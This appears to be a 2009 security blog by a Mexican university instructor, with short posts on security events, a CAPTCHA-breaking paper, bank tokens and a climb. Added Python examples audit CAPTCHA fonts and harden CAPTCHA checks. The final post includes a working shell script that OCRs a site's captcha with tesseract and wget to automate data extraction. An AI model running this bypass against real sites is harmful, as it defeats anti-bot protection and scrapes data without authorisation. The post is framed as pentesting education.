Monday, November 16, 2009

International Computer Security Day (DISC)

DISC 2009 México will be held on November 30, 2009, at the Instituto de Investigaciones en Materiales, located on the Ciudad Universitaria campus.

DISC is the Día Internacional de la Seguridad en Cómputo (International Computer Security Day). It is an observance established by the Association for Computing Machinery (ACM) in 1988 with the purpose of raising awareness of computer security problems. Over the years, interest in this day has grown worldwide. The Departamento de Seguridad en Cómputo/UNAM-CERT of the Dirección General de Servicios de Cómputo Académico has been the official body in Mexico in charge of celebrating DISC since 1994.

This year, the main theme of DISC will be "La primera defensa eres tú" ("You are the first line of defense").

Link

CAPTCHA Security: A Case Study

"CAPTCHAs have been widely used across the Internet to defend against undesirable or malicious bot programs. In this article, the authors describe the security of a CAPTCHA reported in a recent peer-reviewed paper and deployed on the Internet. They show that although this scheme was effectively resistant to one of the best optical character recognition programs on the market, they could break it with a success rate of higher than 90 percent by using a simple but novel attack. In contrast to early work that relied on sophisticated computer vision or machine learning algorithms, they used simple pattern recognition algorithms that exploited fatal design errors. The main contribution of their work is that simply counting the pixels in a CAPTCHA's characters can be a very powerful attack."

Link to e-article.
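The abstract's main finding is that a CAPTCHA whose characters each have a distinct ink-pixel count can be read by counting pixels, with no OCR at all. The following is an added design-audit example, not code from the paper: it takes a constructed 5x7 toy alphabet (hypothetical glyph shapes, '#' for ink) and reports which characters a pixel-counting solver could identify with certainty, which is the check a CAPTCHA designer would run before shipping a font.

```python
"""Design audit for the pixel-count weakness described in the abstract above.

Added illustration, not code from the paper. The alphabet below is a
constructed 5x7 toy font: '#' is an ink pixel, '.' is background. If a glyph's
ink count is unique within the alphabet, a solver can identify that character
by counting pixels alone, so the designer should make counts collide (or vary
per rendering) before deploying the scheme.
"""
from collections import defaultdict

# Constructed toy alphabet (hypothetical shapes chosen for illustration).
ALPHABET = {
    "I": ["..#..", "..#..", "..#..", "..#..", "..#..", "..#..", "..#.."],
    "L": ["#....", "#....", "#....", "#....", "#....", "#....", "#####"],
    "T": ["#####", "..#..", "..#..", "..#..", "..#..", "..#..", "..#.."],
    "O": [".###.", "#...#", "#...#", "#...#", "#...#", "#...#", ".###."],
    "C": [".####", "#....", "#....", "#....", "#....", "#....", ".####"],
}


def ink_count(bitmap):
    """Number of ink pixels in one glyph bitmap."""
    return sum(row.count("#") for row in bitmap)


def audit(alphabet):
    """Group characters by ink count. A group of size 1 means that character
    is recoverable from its pixel count alone."""
    groups = defaultdict(list)
    for ch, bitmap in alphabet.items():
        groups[ink_count(bitmap)].append(ch)
    return {count: sorted(chars) for count, chars in groups.items()}


def count_only_recoverable(alphabet):
    """Characters a pixel-counting solver identifies with certainty."""
    return {chars[0] for chars in audit(alphabet).values() if len(chars) == 1}


def leak_fraction(alphabet):
    """Share of the alphabet that leaks through pixel counting (1.0 = all)."""
    return len(count_only_recoverable(alphabet)) / len(alphabet)


if __name__ == "__main__":
    print(audit(ALPHABET))
    print("recoverable by counting alone:", sorted(count_only_recoverable(ALPHABET)))
    print("leak fraction:", leak_fraction(ALPHABET))
```

In the toy alphabet only L and T share a count (11 pixels), so three of the five characters leak; a scheme that passes this audit still needs the usual distortion, since the audit only covers the single design error the paper exploits.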

Friday, October 23, 2009

Friday, October 16, 2009

Evolt

One of the founding members of evolt.org, Adrian Roselli, has provided the archive as well as its support through his company, Algonquin Studios.
Lots of legacy browsers...

Wednesday, August 19, 2009

Security seminar at UNAM

The Facultad de Ingeniería, through its División de Ingeniería Eléctrica, cordially invites you to:

Seminars given by:

Ing. Pavel Ocenasek, graduating PhD candidate
Brno University of Technology, Czech Republic
http://pavel.ocenasek.com/

Videoconference room of the Centro de Docencia, Anexo de la Facultad de Ingeniería

August 21, 24 and 25, 2009, from 12:00 to 14:00

Seminars on the following topics:

- Security Protocols and Authentication/Key Distribution Schemes
- Evolutionary Computation in Network Communication
- Evolutionary Algorithms in Security Design
- Computer Networks and Security
- CISCO Networking technologies (routers, switches, LAN, WAN, ...)
- Web Technologies and Security
- Web Accessibility
- Electronic Commerce, Payment Systems and Payment Protocols

Wednesday, August 12, 2009

New semester

Today is the third day of a new semester at UNAM (both BS and MS). I have 6 students in "selected topics of security"; we will be working with OSSTMM and vulnerability analysis, as well as fuzzing and other cool topics. The first challenge we face as teachers is learning the students' names. I only have 6 now, but I used to have 40 when teaching other classes; I found a link with useful steps to remember most of the names, it's here.

Thursday, June 11, 2009

Security Flaw Hits VAserv; Head of LxLabs Found Hanged

"The discovery of 24 security vulnerabilities may have contributed to the death of the chief of LxLabs. A flaw in the company's HyperVM software allowed data on 100,000 sites, all hosted by VAserv, to be destroyed. The HyperVM solution is popular with cheap web hosting services and the attacks are easy to reproduce, which could lead to further incidents."

Link to the news.

Tuesday, April 28, 2009

Off-topic: Summit @ Pico de Orizaba

This is totally off-topic, but it represents a personal achievement for me. Last Sunday, April 26th, I climbed Citlaltépetl to the summit (5630 msnm/masl), the highest point in Mexico, at 6:45 am local time.

Thanks to the brave and professional fellows at Grupo Universitario de Alta Montaña (UNAM). Here's the link to the pictures. Mens sana in corpore sano.

Thursday, April 23, 2009

New token from Banamex

A month ago I got an e-mail from Banamex (but hadn't had time to write a blog entry) notifying me of a new scheme to access the online banking system. (It's not a coincidence that Banamex is one of the main targets in Mexico for online fraud; they have a very weak system to authenticate users through an event-based token.) It's good news to know that they're finally moving to a more effective system (although not fool-proof, there's still a scenario with MITM).

I haven't received the new token yet, so I don't have first-hand experience, BUT... I hope the challenge-response scheme they're announcing implements TIME-BASED numbers and not only EVENT-BASED ones like they do now.

Tuesday, January 6, 2009

Captcha circumvention

Last week I was trying to bypass a captcha implementation (JCAPTCHA) on a website I was hired to pentest. Although captchas can get very difficult to bypass, I found a "weak link" through the WAP portion of the portal in question, and I could extract a significant portion of data by abusing the nonexistent distortion of the letters shown in the image.


You see, there is an OCR (optical character recognition software) for Linux (tesseract) capable of "reading" the image given to the user; this tool will write the characters to a text file.
Using wget we can send HTTP queries to a website, save and load cookies, and write data to the filesystem. Putting it all together, we get a shell script that will circumvent the captcha protection and extract the data automatically (it's effective around 60% of the time).

#!/bin/sh
# The value to look up is passed as the first argument (the original used two
# different names, $somevalue and $query, for the same variable).
query="$1"

# Fetch the captcha image and keep the session cookie that comes with it.
wget http://www.somesite.com/jcaptcha --save-cookies cookies.txt --keep-session-cookies -O /tmp/captcha.jpg 2> /dev/null
# Convert to a grayscale TIFF, which is what tesseract reads.
djpeg -grayscale /tmp/captcha.jpg | convert - /tmp/captcha.tiff
# OCR the image; tesseract writes its guess to jcaptcha.txt.
tesseract /tmp/captcha.tiff jcaptcha
# Strip the newline and any spaces so they do not end up in the URL.
cap=$(tr -d ' \n' < jcaptcha.txt)
# Submit the query together with the OCR'd captcha, reusing the session cookie.
wget "http://www.somesite.com/servlet?niv=&nrpv=&query=$query&captcha=$cap" --load-cookies cookies.txt -O salida.txt 2> /dev/null
# Byte count of the response (reading from stdin makes wc print the number alone,
# so it is not truncated to three characters as with the original cut -c1-3).
tam=$(wc -c < salida.txt)
echo "$tam"
# The default error page is assumed to be exactly 701 bytes; anything else is kept.
if [ "$tam" -ne 701 ]; then
mv salida.txt "$query.txt"
fi

You may wonder why the script uses a length of 701 bytes to detect whether the captcha has been defeated; well, it's just assuming the default "error" page has a length of 701 bytes, and any other length is assumed to be info extracted from the database (ok, it's not the best approach, but it's just a PoC).
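What the server side would need so that a loop like the one above cannot simply retry until its 60% OCR gets lucky, as an added example that is not part of the original post and is neither JCAPTCHA's code nor the pentested portal's: one outstanding challenge per session (re-fetching replaces it), a short expiry, single use whether the answer is right or wrong, and a lockout after a few failures. Class, method names and the limits are assumptions for this illustration.

```python
"""Server-side CAPTCHA gate that closes the gaps an OCR retry loop relies on.

Added illustration, not JCAPTCHA's code and not the portal's. Names and
limits (ttl, max_failures, lockout) are assumptions chosen for the example.
"""
import hmac
import secrets


class CaptchaGate:
    def __init__(self, ttl=120, max_failures=5, lockout=300):
        self.ttl = ttl
        self.max_failures = max_failures
        self.lockout = lockout
        self.challenges = {}  # session_id -> (challenge_id, answer, expires_at)
        self.failures = {}    # session_id -> [failure_count, locked_until]

    def issue(self, session_id, answer, now):
        """Create a challenge bound to the session. Fetching again replaces the
        old one, so a client cannot stockpile images and pick the easiest."""
        challenge_id = secrets.token_urlsafe(16)
        self.challenges[session_id] = (challenge_id, answer, now + self.ttl)
        return challenge_id

    def verify(self, session_id, challenge_id, answer, now):
        """True only for a fresh, unused, correctly answered challenge from the
        same session. The reason for a refusal is not reported to the client."""
        count, locked_until = self.failures.get(session_id, [0, 0])
        if now < locked_until:
            return False
        record = self.challenges.pop(session_id, None)  # single use, pass or fail
        ok = (
            record is not None
            and record[2] > now
            and hmac.compare_digest(record[0].encode(), challenge_id.encode())
            and hmac.compare_digest(record[1].lower().encode(),
                                    answer.strip().lower().encode())
        )
        if ok:
            self.failures.pop(session_id, None)
            return True
        count += 1
        locked_until = now + self.lockout if count >= self.max_failures else 0
        self.failures[session_id] = [count, locked_until]
        return False


def demo():
    """Constructed scenario showing each protection in turn."""
    gate = CaptchaGate(ttl=120, max_failures=3, lockout=300)
    results = {}
    # 1. Correct answer works once; submitting the same solved challenge again fails.
    cid = gate.issue("s1", "K7PQ", now=0)
    results["first_use"] = gate.verify("s1", cid, "k7pq", now=10)
    results["replay"] = gate.verify("s1", cid, "k7pq", now=11)
    # 2. A challenge older than ttl is refused even with the right answer.
    cid = gate.issue("s1", "ZZ9A", now=100)
    results["expired"] = gate.verify("s1", cid, "ZZ9A", now=300)
    # 3. A challenge issued to one session cannot be spent from another.
    cid = gate.issue("s2", "QA33", now=400)
    results["cross_session"] = gate.verify("s3", cid, "QA33", now=401)
    # 4. Three OCR misses lock the session; a correct answer during the lockout
    #    is refused, and after it expires a fresh challenge works again.
    for i in range(3):
        cid = gate.issue("s4", "M4ND", now=500 + i)
        gate.verify("s4", cid, "WRONG", now=501 + i)
    cid = gate.issue("s4", "M4ND", now=510)
    results["locked"] = gate.verify("s4", cid, "M4ND", now=511)
    cid = gate.issue("s4", "M4ND", now=900)
    results["after_lockout"] = gate.verify("s4", cid, "M4ND", now=901)
    return results


if __name__ == "__main__":
    print(demo())
```

Throttling and single use bound the extraction rate; they do not replace distortion. The weak link in the post was an undistorted image on the WAP portal, and that image has to be as hard to OCR as the one served to desktop browsers, or the gate above only slows the loop down.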